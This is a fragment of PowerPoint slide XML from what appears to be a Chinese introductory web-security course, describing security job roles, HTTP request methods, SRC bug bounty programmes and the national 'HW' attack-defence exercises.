            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>安全实验室研究人员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>（甲乙方均有）：偏安全研究，某个方向资深研究人员，资深漏洞挖掘人员。比如二进制、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>LOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>、工控。对底层研发能力要求较高，每年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>HW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>之类的大部分出自实验室选手。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>安全运营人员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>（运营岗位通常不会有专家职级）：偏向于安全资讯通报（安全事件、漏洞预警、小贴士等）、安全情报监控、安全制度宣贯，有部分公司也将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>SRC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>交给安全运营人员管理，类似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>BP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>角色来监督应用安全人员的安全建设成果。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>信息安全工程师</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：属于全能选手，如果甲方安全团队不是特别大，基本以上所有工作都会落到信息安全师的身上哦</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>......</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>基本涵盖安全测试、代码审计、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>SRC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>漏洞审核等基本一切安全工作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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98880" y="366395"/>
            <a:ext cx="2691130" cy="1320165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="513715" y="1877060"/>
            <a:ext cx="3376295" cy="4623435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028440" y="217805"/>
            <a:ext cx="2826385" cy="6282690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7560310" y="217805"/>
            <a:ext cx="4038600" cy="1243330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7887335" y="1581785"/>
            <a:ext cx="3240405" cy="46901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98880" y="479425"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>乙方岗位</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235585" y="1246505"/>
            <a:ext cx="11511915" cy="4930140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全产品技术工程师（招聘角度为安全运维）：技能偏网络、操作系统、数据库等。主要围绕公司自己服务范围的产品提供技术支持，如安装部署、故障处理、项目实施。比如你是在一家做防火墙的厂家，那你的主要职责就是围绕防火墙产品进行相关项目实施交付。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全服务工程师：技能偏渗透测试，主要通过人</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工具的能力为客户提供安全服务类项目的交付，比如渗透测试、应急响应等，在大一点做整个安全服务项目的咨询和落地。最近这几年随着</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的升级，围绕实战的渗透测试这个技术分支逐渐被重视起来，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全服务工程师</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主要是指非产品实施交付方向的，主要是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>渗透测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>技术为用户提供服务，比如做安全测试、代码审计、应急响应、攻防演练等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测评工程师：包括等保测评、风险评估、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ISO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测评、密评、数据安全评估等一系列服务于甲方的安全测评项目工作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全开发工程师：负责某个安全产品的开发，本质上是一个程序员，只是面对的业务是安全。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实验室安全研究人员：负责漏洞挖掘、新漏洞的跟踪和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>维护、前沿技术的研究，为产品和服务赋能。在各个安全实验室埋头挖漏洞搞安全技术研究的人，比如腾讯云的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>玄武实验室</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等，通常也负责各级别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、对抗的攻方主力。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>售前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>解决方案工程师：一般从技术工程工程师发展而来，负责项目售前阶段的方案规划、招投标、客户交流、配合销售完成项目。解决方案工程师对技术的广度、沟通能力、综合方案能力要求会比较高，既要能够九天揽月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搞定用户，与销售一起拿下项目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，还要能够下海捉鳖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、写方案、用户现场</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>POC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</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78890" y="269875"/>
            <a:ext cx="2830195" cy="1541145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278890" y="1925320"/>
            <a:ext cx="2726690" cy="4329430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4795520" y="269875"/>
            <a:ext cx="2413635" cy="1435100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="1858645"/>
            <a:ext cx="2609850" cy="4681220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7858125" y="5596890"/>
            <a:ext cx="3397250" cy="657860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId5" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>D:\BaiduSyncdisk\bafangwy\xiaodi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:hlinkClick r:id="rId5" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>学习方向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:hlinkClick r:id="rId5" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7758430" y="4719955"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语雀商行攻击资料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>展示</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46835" y="392430"/>
            <a:ext cx="4064000" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>常见请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179830" y="1463675"/>
            <a:ext cx="10067925" cy="448373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68675" y="2803525"/>
            <a:ext cx="5435600" cy="752475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.7.web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全实战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>途径</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6355" y="546735"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>漏洞赏金计划</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661670" y="1356995"/>
            <a:ext cx="10604500" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SRC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Security Response Center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，安全应急</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>响应中心）发起的漏洞赏金计划，是企业通过对外激励安全研究员发现并负责任披露漏洞，以降低产品风险、提升安全治理能力的一种长期机制。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741680" y="2339975"/>
            <a:ext cx="5937250" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>https://www.butian.net/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>https://src.sjtu.edu.cn/list/firm/3114</a:t>
            </a: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329055" y="509905"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>护网行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537210" y="1227455"/>
            <a:ext cx="11012805" cy="2030095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络安全攻防演练是一种模拟真实网络环境下攻击和防御的实践活动，目的是评估和提升组织或企业的网络安全能力。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>相比于渗透测试，网络安全攻防演练完全在真实环境中进行，而且不限制攻击手段，所以能够更真实地反应企业的安全水平，发现更多的安全薄弱点。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>各省、各市、各地区、各行业及某些大型企业，每年都会举办网络安全攻防演练。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537210" y="3304540"/>
            <a:ext cx="11049635" cy="3439160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在所有的攻防演练中，规模最大、参与人数最多的莫过于起始于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年的「公安部牵头」的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>护网行动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（缩写：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HVV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>护网行动分为攻击方（红队）和防守方（蓝队）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>红队是国家召集的网络安全高手，在北京聚集。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蓝队是国家挑选的单位和企业，例如：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>运营商</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>中国电信、中国移动、中国联通</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>金融：农业银行、中信银行、中国银行、工商银行、建设银行、交通银行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>能源：中国华电集团公司、中煤能源公司、国能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>电力：华能、华电、国电、国电投和大唐</a:t>
